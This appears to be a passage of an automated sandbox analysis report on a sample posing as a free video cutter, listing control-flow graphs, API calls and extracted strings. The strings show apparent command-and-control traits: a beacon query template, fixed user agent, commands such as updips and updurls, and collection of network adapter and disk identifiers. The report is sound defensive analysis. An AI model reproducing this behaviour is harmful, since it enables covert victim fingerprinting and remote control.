                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _malloc$Heap$_memset$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                              • String ID: {?$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                              • API String ID: 1856495841-4024086645
                                                                              • Opcode ID: 3f592b7ef38c67ecc8576cab383424f3145a6bde54ecddfbae8316dd21ba1bf0
                                                                              • Instruction ID: c661365dcc301ddb4f80939225a14aee2687e89ddd4d672d7fe49e706d3e2221
                                                                              • Opcode Fuzzy Hash: 3f592b7ef38c67ecc8576cab383424f3145a6bde54ecddfbae8316dd21ba1bf0
                                                                              • Instruction Fuzzy Hash: C771C5B1D18340AFD710AF75AC09F5BBFE8AF86320F15091DF588972D2D7B869408B96

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 568 99605a-99607e 569 996048 568->569 570 996090-996094 568->570 571 99604a-996052 569->571 572 9960c4-9960cb 569->572 573 9960a3-9960a9 570->573 574 996096 570->574 576 996029-996035 571->576 577 996054-996059 571->577 575 9960cc-9960cf 572->575 579 9960ab 573->579 578 9960b0-9960bd 574->578 580 9960d1-9960ed 575->580 581 9960c3 575->581 576->569 577->568 578->570 582 9960bf 578->582 579->578 580->579 583 9960ef-9960f0 580->583 581->572 582->575 584 9960c0-9960c2 582->584 585 9960f3-99610c 583->585 584->581 584->585 585->584 586 99610e 585->586 587 996151-996193 586->587 588 996110-996130 586->588 590 996194-99619f 587->590 589 996145-99614e 588->589 591 996150 589->591 592 9961a1-9961a4 590->592 593 9961e0-9961e5 590->593 591->587 592->589 596 9961a6 592->596 594 996212-996217 593->594 595 9961e6-9961ec 593->595 599 996218-996228 594->599 600 9961a7-9961c1 594->600 597 99622f-996233 595->597 598 9961ee 595->598 596->591 596->600 601 9961f0-9961f6 597->601 602 996235-996236 597->602 598->601 603 9961cb-9961dc 599->603 609 99622b 599->609 600->603 604 9961f7-9961fb 601->604 606 996238-99623b 602->606 607 9962aa-9962b2 call 99439c 602->607 603->593 604->590 608 9961fd-9961ff 604->608 606->604 611 99623d-996256 606->611 617 995f08-995f0a 607->617 618 9962b8-9962e3 RtlEnterCriticalSection RtlLeaveCriticalSection call 9a10ec 607->618 612 996258-996262 608->612 613 996201-99620e 608->613 609->597 611->612 615 99627e-996288 612->615 616 996264-99626a 612->616 613->594 615->617 621 99628e-9962a9 call 9a38a0 615->621 619 99626c-99626e 616->619 620 996270-99627d call 9953ec 616->620 623 995f0c-995f11 617->623 624 995f13-995f15 617->624 633 99632d-996345 call 9a10ec 618->633 634 9962e5-9962f4 call 9a10ec 618->634 619->615 620->615 621->607 625 995f1c Sleep 623->625 628 995f22-995f51 RtlEnterCriticalSection RtlLeaveCriticalSection 624->628 629 995f17 624->629 625->628 628->576 629->625 640 99634b-99634d 633->640 641 9965ee-9965fd call 9a10ec 633->641 634->633 639 9962f6-996305 call 9a10ec 634->639 639->633 651 996307-996316 call 9a10ec 639->651 640->641 644 996353-9963fe call 9a1d5c RtlEnterCriticalSection RtlLeaveCriticalSection call 9a38a0 * 5 call 99439c * 2 640->644 648 9965ff-996601 641->648 649 996642-996651 call 9a10ec 641->649 702 99643b 644->702 703 996400-996402 644->703 648->649 652 996603-99663d call 9a38a0 RtlEnterCriticalSection RtlLeaveCriticalSection 648->652 662 996653-996661 call 995a29 call 995b37 649->662 663 996666-996675 call 9a10ec 649->663 651->633 664 996318-996327 call 9a10ec 651->664 652->617 662->617 675 99667b-99667d 663->675 676 99698c-99699b call 9a10ec 663->676 664->617 664->633 675->676 677 996683-99669c call 99439c 675->677 676->617 686 9969a1-9969cd call 9a1d5c call 9a38a0 call 99439c 676->686 677->617 687 9966a2-996770 call 9a11c8 call 991ba7 677->687 708 9969cf-9969d1 call 99534d 686->708 709 9969d6-9969dd call 9a1d24 686->709 705 996772 call 99143f 687->705 706 996777-996798 RtlEnterCriticalSection 687->706 710 99643f-99646d call 9a1d5c call 9a38a0 call 99439c 702->710 703->702 707 996404-996416 call 9a10ec 703->707 705->706 712 99679a-9967a1 706->712 713 9967a4-99680b RtlLeaveCriticalSection call 993c67 call 993d7e call 9970ea 706->713 707->702 723 996418-996439 call 99439c 707->723 708->709 709->617 736 99646f-99647e call 9a2396 710->736 737 9964ae-9964b7 call 9a1d24 710->737 712->713 734 996811-996853 call 9994d4 713->734 735 996973-996987 call 997db2 713->735 723->710 747 996859-996860 734->747 748 99693d-99696e call 997199 call 9933b2 734->748 735->617 736->737 746 996480 736->746 749 9964bd-9964d5 call 9a28fc 737->749 750 9965dc-9965e9 737->750 751 996485-996497 call 9a1600 746->751 753 996863-996868 747->753 748->735 759 9964e1 749->759 760 9964d7-9964df call 9984e6 749->760 750->617 766 996499 751->766 767 99649c-9964ac call 9a2396 751->767 753->753 757 99686a-9968af call 9994d4 753->757 757->748 772 9968b5-9968bb 757->772 765 9964e3-996589 call 9995fe call 993863 call 995119 call 993863 call 9998a4 call 9999be 759->765 760->765 792 99658b call 99380b 765->792 793 996590-9965bb Sleep call 9a06a0 765->793 766->767 767->737 767->751 775 9968be-9968c3 772->775 775->775 777 9968c5-996900 call 9994d4 775->777 777->748 782 996902-99693c call 99bec6 777->782 782->748 792->793 797 9965bd-9965c6 call 994100 793->797 798 9965c7-9965d5 793->798 797->798 798->750 800 9965d7 call 99380b 798->800 800->750
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $"gk$%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                              • API String ID: 0-2712571627
                                                                              • Opcode ID: cc10e829798e289c9eaea95da83cda4309410800d4195ac11471a7da668302a1
                                                                              • Instruction ID: c16b196ddc1dfaae8413345b3d6dd8e757b0686e77b40567bd9179b058fead0e
                                                                              • Opcode Fuzzy Hash: cc10e829798e289c9eaea95da83cda4309410800d4195ac11471a7da668302a1
                                                                              • Instruction Fuzzy Hash: 8C42787250C3819FDB359B78D842BAFBBE9AFD6324F14481DF48587292EB319805C792

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1140 401b4b-401b68 LoadLibraryA 1141 401c21-401c25 1140->1141 1142 401b6e-401b7f GetProcAddress 1140->1142 1143 401b85-401b8e 1142->1143 1144 401c18-401c1b FreeLibrary 1142->1144 1145 401b95-401ba5 GetAdaptersInfo 1143->1145 1144->1141 1146 401ba7-401bb0 1145->1146 1147 401bdb-401be3 1145->1147 1148 401bc1-401bd7 call 402db0 call 4018cc 1146->1148 1149 401bb2-401bb6 1146->1149 1150 401be5-401beb call 402d96 1147->1150 1151 401bec-401bf0 1147->1151 1148->1147 1149->1147 1152 401bb8-401bbf 1149->1152 1150->1151 1155 401bf2-401bf6 1151->1155 1156 401c15-401c17 1151->1156 1152->1148 1152->1149 1155->1156 1159 401bf8-401bfb 1155->1159 1156->1144 1161 401c06-401c13 call 402d88 1159->1161 1162 401bfd-401c03 1159->1162 1161->1145 1161->1156 1162->1161
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00401B5D
                                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                              • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                              • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                              • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                              • API String ID: 514930453-3667123677
                                                                              • Opcode ID: bc005ef754f3a5303546a32743d4883a9e6c3ebee7d3eb6cc9c7947b2eeee021
                                                                              • Instruction ID: 26a35b0e434a944fb2e6f971c7f33de8a7c2d2a3e5cb9eaf2de76edc7c74b596
                                                                              • Opcode Fuzzy Hash: bc005ef754f3a5303546a32743d4883a9e6c3ebee7d3eb6cc9c7947b2eeee021
                                                                              • Instruction Fuzzy Hash: 1821A770944209AEDF219F65C9447EF7BB8EF41345F0440BAE504B22E1E7789D85CB69

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1221 99e756-99e779 LoadLibraryA 1222 99e839-99e840 1221->1222 1223 99e77f-99e78d GetProcAddress 1221->1223 1224 99e793-99e7a3 1223->1224 1225 99e832-99e833 FreeLibrary 1223->1225 1226 99e7a5-99e7b1 GetAdaptersInfo 1224->1226 1225->1222 1227 99e7e9-99e7f1 1226->1227 1228 99e7b3 1226->1228 1229 99e7fa-99e7ff 1227->1229 1230 99e7f3-99e7f9 call 9a2558 1227->1230 1231 99e7b5-99e7bc 1228->1231 1233 99e82d-99e831 1229->1233 1234 99e801-99e804 1229->1234 1230->1229 1235 99e7be-99e7c2 1231->1235 1236 99e7c6-99e7ce 1231->1236 1233->1225 1234->1233 1238 99e806-99e80b 1234->1238 1235->1231 1239 99e7c4 1235->1239 1240 99e7d1-99e7d6 1236->1240 1241 99e818-99e823 call 9a28fc 1238->1241 1242 99e80d-99e815 1238->1242 1239->1227 1240->1240 1243 99e7d8-99e7e5 call 99e4a5 1240->1243 1241->1233 1248 99e825-99e828 1241->1248 1242->1241 1243->1227 1248->1226
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 0099E76C
                                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 0099E785
                                                                              • GetAdaptersInfo.IPHLPAPI(?,?), ref: 0099E7AA
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0099E833
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                              • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                              • API String ID: 514930453-3114217049
                                                                              • Opcode ID: 29a5d6a0707e6586a9a3d179ca860a3b3be8ba5b299053ae38cfe0142a056858
                                                                              • Instruction ID: 0c7ca66f7c1dfeca31ea828f3c5156a8c58447df815009ae906ed1d487675a04
                                                                              • Opcode Fuzzy Hash: 29a5d6a0707e6586a9a3d179ca860a3b3be8ba5b299053ae38cfe0142a056858
                                                                              • Instruction Fuzzy Hash: 6D219C75E042099BDF10DBEE9884AEEBBB8AF55310F1441A9E504E7241DB349E458BA1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1498 992b95-992baf 1499 992bb1-992bb9 call 99f8c0 1498->1499 1500 992bc7-992bcb 1498->1500 1509 992bbf-992bc2 1499->1509 1502 992bcd-992bd0 1500->1502 1503 992bdf 1500->1503 1502->1503 1506 992bd2-992bdd call 99f8c0 1502->1506 1504 992be2-992c11 WSASetLastError WSARecv call 9992b8 1503->1504 1511 992c16-992c1d 1504->1511 1506->1509 1512 992d30 1509->1512 1514 992c2c-992c32 1511->1514 1515 992c1f-992c2a call 99f8c0 1511->1515 1513 992d32-992d38 1512->1513 1517 992c34-992c39 call 99f8c0 1514->1517 1518 992c46-992c48 1514->1518 1525 992c3f-992c42 1515->1525 1517->1525 1521 992c4a-992c4d 1518->1521 1522 992c4f-992c60 call 99f8c0 1518->1522 1523 992c66-992c69 1521->1523 1522->1513 1522->1523 1528 992c6b-992c6d 1523->1528 1529 992c73-992c76 1523->1529 1525->1518 1528->1529 1530 992d22-992d2d call 991996 1528->1530 1529->1512 1531 992c7c-992c9a call 99f8c0 call 99166f 1529->1531 1530->1512 1538 992cbc-992cfa WSASetLastError select call 9992b8 1531->1538 1539 992c9c-992cba call 99f8c0 call 99166f 1531->1539 1544 992d08 1538->1544 1545 992cfc-992d06 call 99f8c0 1538->1545 1539->1512 1539->1538 1548 992d0a-992d12 call 99f8c0 1544->1548 1549 992d15-992d17 1544->1549 1553 992d19-992d1d 1545->1553 1548->1549 1549->1512 1549->1553 1553->1504
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000), ref: 00992BE4
                                                                              • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 00992C07
                                                                                • Part of subcall function 009992B8: WSAGetLastError.WS2_32(00000000,?,?,00992A51), ref: 009992C6
                                                                              • WSASetLastError.WS2_32 ref: 00992CD3
                                                                              • select.WS2_32(?,?,00000000,00000000,00000000), ref: 00992CE7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Recvselect
                                                                              • String ID: 3'
                                                                              • API String ID: 886190287-280543908
                                                                              • Opcode ID: fd95522ab59c2210d89776c4275d044658eaff7409cc74f344900fa8a854b95a
                                                                              • Instruction ID: be9f2d187227786d8c9413b74aaff9a1818314bfc389d9256730cf3eb7b4eb37
                                                                              • Opcode Fuzzy Hash: fd95522ab59c2210d89776c4275d044658eaff7409cc74f344900fa8a854b95a
                                                                              • Instruction Fuzzy Hash: 00417CB1918301AFDF109F6CC50576BBBE8AF95364F104D2EF899C7281EB75D9408BA2

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1555 99e652-99e67d CreateFileA 1556 99e74e-99e755 1555->1556 1557 99e683-99e698 1555->1557 1558 99e69b-99e6bd DeviceIoControl 1557->1558 1559 99e6bf-99e6c7 1558->1559 1560 99e6f6-99e6fe 1558->1560 1563 99e6c9-99e6ce 1559->1563 1564 99e6d0-99e6d5 1559->1564 1561 99e700-99e706 call 9a2558 1560->1561 1562 99e707-99e709 1560->1562 1561->1562 1567 99e70b-99e70e 1562->1567 1568 99e744-99e74d CloseHandle 1562->1568 1563->1560 1564->1560 1565 99e6d7-99e6df 1564->1565 1569 99e6e2-99e6e7 1565->1569 1571 99e72a-99e737 call 9a28fc 1567->1571 1572 99e710-99e719 GetLastError 1567->1572 1568->1556 1569->1569 1573 99e6e9-99e6f5 call 99e4a5 1569->1573 1571->1568 1579 99e739-99e73f 1571->1579 1572->1568 1574 99e71b-99e71e 1572->1574 1573->1560 1574->1571 1578 99e720-99e727 1574->1578 1578->1571 1579->1558
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 0099E671
                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 0099E6AF
                                                                              • GetLastError.KERNEL32 ref: 0099E710
                                                                              • CloseHandle.KERNEL32(?), ref: 0099E747
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                              • String ID: \\.\PhysicalDrive0
                                                                              • API String ID: 4026078076-1180397377
                                                                              • Opcode ID: fa9e42461b4e383a003481c77d61e44f144a14d629621fed71210b01911a2c54
                                                                              • Instruction ID: ea6b4aca2db6032bec5775d08afbd8f4ccaeb9ebdae41dd3590df0dc3c560930
                                                                              • Opcode Fuzzy Hash: fa9e42461b4e383a003481c77d61e44f144a14d629621fed71210b01911a2c54
                                                                              • Instruction Fuzzy Hash: 6C31A071E00219EBCF24DF9DC984AEEBBB9EB45720F24416AF504A7280D7746E00DB91

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1581 401a4f-401a77 CreateFileA 1582 401b45-401b4a 1581->1582 1583 401a7d-401a91 1581->1583 1584 401a98-401ac0 DeviceIoControl 1583->1584 1585 401ac2-401aca 1584->1585 1586 401af3-401afb 1584->1586 1589 401ad4-401ad9 1585->1589 1590 401acc-401ad2 1585->1590 1587 401b04-401b07 1586->1587 1588 401afd-401b03 call 402d96 1586->1588 1592 401b09-401b0c 1587->1592 1593 401b3a-401b44 CloseHandle 1587->1593 1588->1587 1589->1586 1594 401adb-401af1 call 402db0 call 4018cc 1589->1594 1590->1586 1596 401b27-401b34 call 402d88 1592->1596 1597 401b0e-401b17 GetLastError 1592->1597 1593->1582 1594->1586 1596->1584 1596->1593 1597->1593 1599 401b19-401b1c 1597->1599 1599->1596 1602 401b1e-401b24 1599->1602 1602->1596
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                              • DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                              • GetLastError.KERNEL32 ref: 00401B0E
                                                                              • CloseHandle.KERNEL32(?), ref: 00401B3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                              • String ID: \\.\PhysicalDrive0
                                                                              • API String ID: 4026078076-1180397377
                                                                              • Opcode ID: c8981459f5e706c06cc7695507db81eaa9930dfb08273bf7247f608f6a192452
                                                                              • Instruction ID: 04dbfa7bc106f75310bb79019ca7befe418b3d091205e7bc0cb177ec4d54a964
                                                                              • Opcode Fuzzy Hash: c8981459f5e706c06cc7695507db81eaa9930dfb08273bf7247f608f6a192452
                                                                              • Instruction Fuzzy Hash: 54316B71D01218EACB21EFA5CD849EFBBB9FF41750F20417AE515B22A0E3785E45CB98
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fbc1468ac63fff6d3fcb0251f380921b6e4081b544cf7a34e2d2f59adc7c17f5
                                                                              • Instruction ID: 0d6fb0ce50f1528b041e60c1e09a7fe6294456f0ae413154e5d114ad2335cf56
                                                                              • Opcode Fuzzy Hash: fbc1468ac63fff6d3fcb0251f380921b6e4081b544cf7a34e2d2f59adc7c17f5
                                                                              • Instruction Fuzzy Hash: 5651857210C681EFDB17AF39C8856AAFBE4EF85710F0A499DCAC147212D7366811CB93

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 995ba2-995bd7 1 995bde-995bf3 0->1 2 995c41-995c58 1->2 3 995bf5-995c29 1->3 2->1 6 995c5a-995c75 2->6 4 995c2b-995c3e 3->4 5 995c90-995f04 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 9942c7 GetTickCount call 9958d7 GetVersionExA call 9a38a0 call 9a1d5c * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 9a38a0 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 9a1d5c * 4 QueryPerformanceCounter Sleep call 9a1d5c * 2 call 9a38a0 * 2 3->5 8 995c78-995c8a 4->8 9 995c40 4->9 53 995f08-995f0a 5->53 8->5 9->2 54 995f0c-995f11 53->54 55 995f13-995f15 53->55 56 995f1c Sleep 54->56 57 995f22-995f51 RtlEnterCriticalSection RtlLeaveCriticalSection 55->57 58 995f17 55->58 56->57 59 996029-996035 57->59 58->56 60 996048 59->60 61 99604a-996052 60->61 62 9960c4-9960cb 60->62 61->59 64 996054-99607e 61->64 63 9960cc-9960cf 62->63 65 9960d1-9960ed 63->65 66 9960c3 63->66 64->60 70 996090-996094 64->70 68 9960ab 65->68 69 9960ef-9960f0 65->69 66->62 74 9960b0-9960bd 68->74 71 9960f3-99610c 69->71 72 9960a3-9960a9 70->72 73 996096 70->73 75 99610e 71->75 76 9960c0-9960c2 71->76 72->68 73->74 74->70 77 9960bf 74->77 78 996151-996193 75->78 79 996110-996130 75->79 76->66 76->71 77->63 77->76 81 996194-99619f 78->81 80 996145-99614e 79->80 82 996150 80->82 83 9961a1-9961a4 81->83 84 9961e0-9961e5 81->84 82->78 83->80 87 9961a6 83->87 85 996212-996217 84->85 86 9961e6-9961ec 84->86 90 996218-996228 85->90 91 9961a7-9961c1 85->91 88 99622f-996233 86->88 89 9961ee 86->89 87->82 87->91 92 9961f0-9961f6 88->92 93 996235-996236 88->93 89->92 94 9961cb-9961dc 90->94 100 99622b 90->100 91->94 95 9961f7-9961fb 92->95 97 996238-99623b 93->97 98 9962aa-9962b2 call 99439c 93->98 94->84 95->81 99 9961fd-9961ff 95->99 97->95 102 99623d-996256 97->102 98->53 108 9962b8-9962e3 RtlEnterCriticalSection RtlLeaveCriticalSection call 9a10ec 98->108 103 996258-996262 99->103 104 996201-99620e 99->104 100->88 102->103 106 99627e-996288 103->106 107 996264-99626a 103->107 104->85 106->53 111 99628e-9962a9 call 9a38a0 106->111 109 99626c-99626e 107->109 110 996270-99627d call 9953ec 107->110 118 99632d-996345 call 9a10ec 108->118 119 9962e5-9962f4 call 9a10ec 108->119 109->106 110->106 111->98 125 99634b-99634d 118->125 126 9965ee-9965fd call 9a10ec 118->126 119->118 124 9962f6-996305 call 9a10ec 119->124 124->118 136 996307-996316 call 9a10ec 124->136 125->126 129 996353-9963fe call 9a1d5c RtlEnterCriticalSection RtlLeaveCriticalSection call 9a38a0 * 5 call 99439c * 2 125->129 133 9965ff-996601 126->133 134 996642-996651 call 9a10ec 126->134 187 99643b 129->187 188 996400-996402 129->188 133->134 137 996603-99663d call 9a38a0 RtlEnterCriticalSection RtlLeaveCriticalSection 133->137 147 996653-996661 call 995a29 call 995b37 134->147 148 996666-996675 call 9a10ec 134->148 136->118 149 996318-996327 call 9a10ec 136->149 137->53 147->53 160 99667b-99667d 148->160 161 99698c-99699b call 9a10ec 148->161 149->53 149->118 160->161 162 996683-99669c call 99439c 160->162 161->53 171 9969a1-9969cd call 9a1d5c call 9a38a0 call 99439c 161->171 162->53 172 9966a2-996770 call 9a11c8 call 991ba7 162->172 193 9969cf-9969d1 call 99534d 171->193 194 9969d6-9969dd call 9a1d24 171->194 190 996772 call 99143f 172->190 191 996777-996798 RtlEnterCriticalSection 172->191 195 99643f-99646d call 9a1d5c call 9a38a0 call 99439c 187->195 188->187 192 996404-996416 call 9a10ec 188->192 190->191 197 99679a-9967a1 191->197 198 9967a4-99680b RtlLeaveCriticalSection call 993c67 call 993d7e call 9970ea 191->198 192->187 208 996418-996439 call 99439c 192->208 193->194 194->53 221 99646f-99647e call 9a2396 195->221 222 9964ae-9964b7 call 9a1d24 195->222 197->198 219 996811-996853 call 9994d4 198->219 220 996973-996987 call 997db2 198->220 208->195 232 996859-996860 219->232 233 99693d-99696e call 997199 call 9933b2 219->233 220->53 221->222 231 996480 221->231 234 9964bd-9964d5 call 9a28fc 222->234 235 9965dc-9965e9 222->235 236 996485-996497 call 9a1600 231->236 238 996863-996868 232->238 233->220 244 9964e1 234->244 245 9964d7-9964df call 9984e6 234->245 235->53 251 996499 236->251 252 99649c-9964ac call 9a2396 236->252 238->238 242 99686a-9968af call 9994d4 238->242 242->233 257 9968b5-9968bb 242->257 250 9964e3-996589 call 9995fe call 993863 call 995119 call 993863 call 9998a4 call 9999be 244->250 245->250 277 99658b call 99380b 250->277 278 996590-9965bb Sleep call 9a06a0 250->278 251->252 252->222 252->236 260 9968be-9968c3 257->260 260->260 262 9968c5-996900 call 9994d4 260->262 262->233 267 996902-99693c call 99bec6 262->267 267->233 277->278 282 9965bd-9965c6 call 994100 278->282 283 9965c7-9965d5 278->283 282->283 283->235 285 9965d7 call 99380b 283->285 285->235
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _malloc$Heap_memset$CriticalSection$AllocateProcess$AddressEnterHandleModuleProcSleep$CountCounterInitializeLeavePerformanceQueryTickVersion
                                                                              • String ID: {?$-.%7$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                              • API String ID: 2188067488-2434742263
                                                                              • Opcode ID: af10b65474d8083a8aaccd200d03b517fdc35b58fdb3b390a01bccaf3de37241
                                                                              • Instruction ID: a52b925224ba821c34b674143cc8fbd866aa5ec0c439bc38bd876e05ef4f7154
                                                                              • Opcode Fuzzy Hash: af10b65474d8083a8aaccd200d03b517fdc35b58fdb3b390a01bccaf3de37241
                                                                              • Instruction Fuzzy Hash: 54A13471D187809FD700AF799C46B5BBFE8AF86320F15062DF588972D2D7789901CB92

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 803 9961c3-9961c6 804 9961cb-9961dc 803->804 805 9961e0-9961e5 804->805 806 996212-996217 805->806 807 9961e6-9961ec 805->807 810 996218-996228 806->810 811 9961a7-9961c1 806->811 808 99622f-996233 807->808 809 9961ee 807->809 812 9961f0-9961f6 808->812 813 996235-996236 808->813 809->812 810->804 820 99622b 810->820 811->804 814 9961f7-9961fb 812->814 816 996238-99623b 813->816 817 9962aa-9962b2 call 99439c 813->817 818 9961fd-9961ff 814->818 819 996194-99619f 814->819 816->814 822 99623d-996256 816->822 831 995f08-995f0a 817->831 832 9962b8-9962e3 RtlEnterCriticalSection RtlLeaveCriticalSection call 9a10ec 817->832 823 996258-996262 818->823 824 996201-99620e 818->824 819->805 825 9961a1-9961a4 819->825 820->808 822->823 827 99627e-996288 823->827 828 996264-99626a 823->828 824->806 829 996145-99614e 825->829 830 9961a6 825->830 827->831 835 99628e-9962a9 call 9a38a0 827->835 833 99626c-99626e 828->833 834 996270-99627d call 9953ec 828->834 836 996150 829->836 830->811 830->836 838 995f0c-995f11 831->838 839 995f13-995f15 831->839 850 99632d-996345 call 9a10ec 832->850 851 9962e5-9962f4 call 9a10ec 832->851 833->827 834->827 835->817 843 996151-996193 836->843 840 995f1c Sleep 838->840 844 995f22-995f51 RtlEnterCriticalSection RtlLeaveCriticalSection 839->844 845 995f17 839->845 840->844 843->819 847 996029-996035 844->847 845->840 855 996048 847->855 860 99634b-99634d 850->860 861 9965ee-9965fd call 9a10ec 850->861 851->850 857 9962f6-996305 call 9a10ec 851->857 858 99604a-996052 855->858 859 9960c4-9960cb 855->859 857->850 878 996307-996316 call 9a10ec 857->878 858->847 864 996054-99607e 858->864 862 9960cc-9960cf 859->862 860->861 866 996353-9963fe call 9a1d5c RtlEnterCriticalSection RtlLeaveCriticalSection call 9a38a0 * 5 call 99439c * 2 860->866 873 9965ff-996601 861->873 874 996642-996651 call 9a10ec 861->874 868 9960d1-9960ed 862->868 869 9960c3 862->869 864->855 879 996090-996094 864->879 938 99643b 866->938 939 996400-996402 866->939 876 9960ab 868->876 877 9960ef-9960f0 868->877 869->859 873->874 880 996603-99663d call 9a38a0 RtlEnterCriticalSection RtlLeaveCriticalSection 873->880 898 996653-996661 call 995a29 call 995b37 874->898 899 996666-996675 call 9a10ec 874->899 887 9960b0-9960bd 876->887 882 9960f3-99610c 877->882 878->850 900 996318-996327 call 9a10ec 878->900 885 9960a3-9960a9 879->885 886 996096 879->886 880->831 890 99610e 882->890 891 9960c0-9960c2 882->891 885->876 886->887 887->879 894 9960bf 887->894 890->843 897 996110-996130 890->897 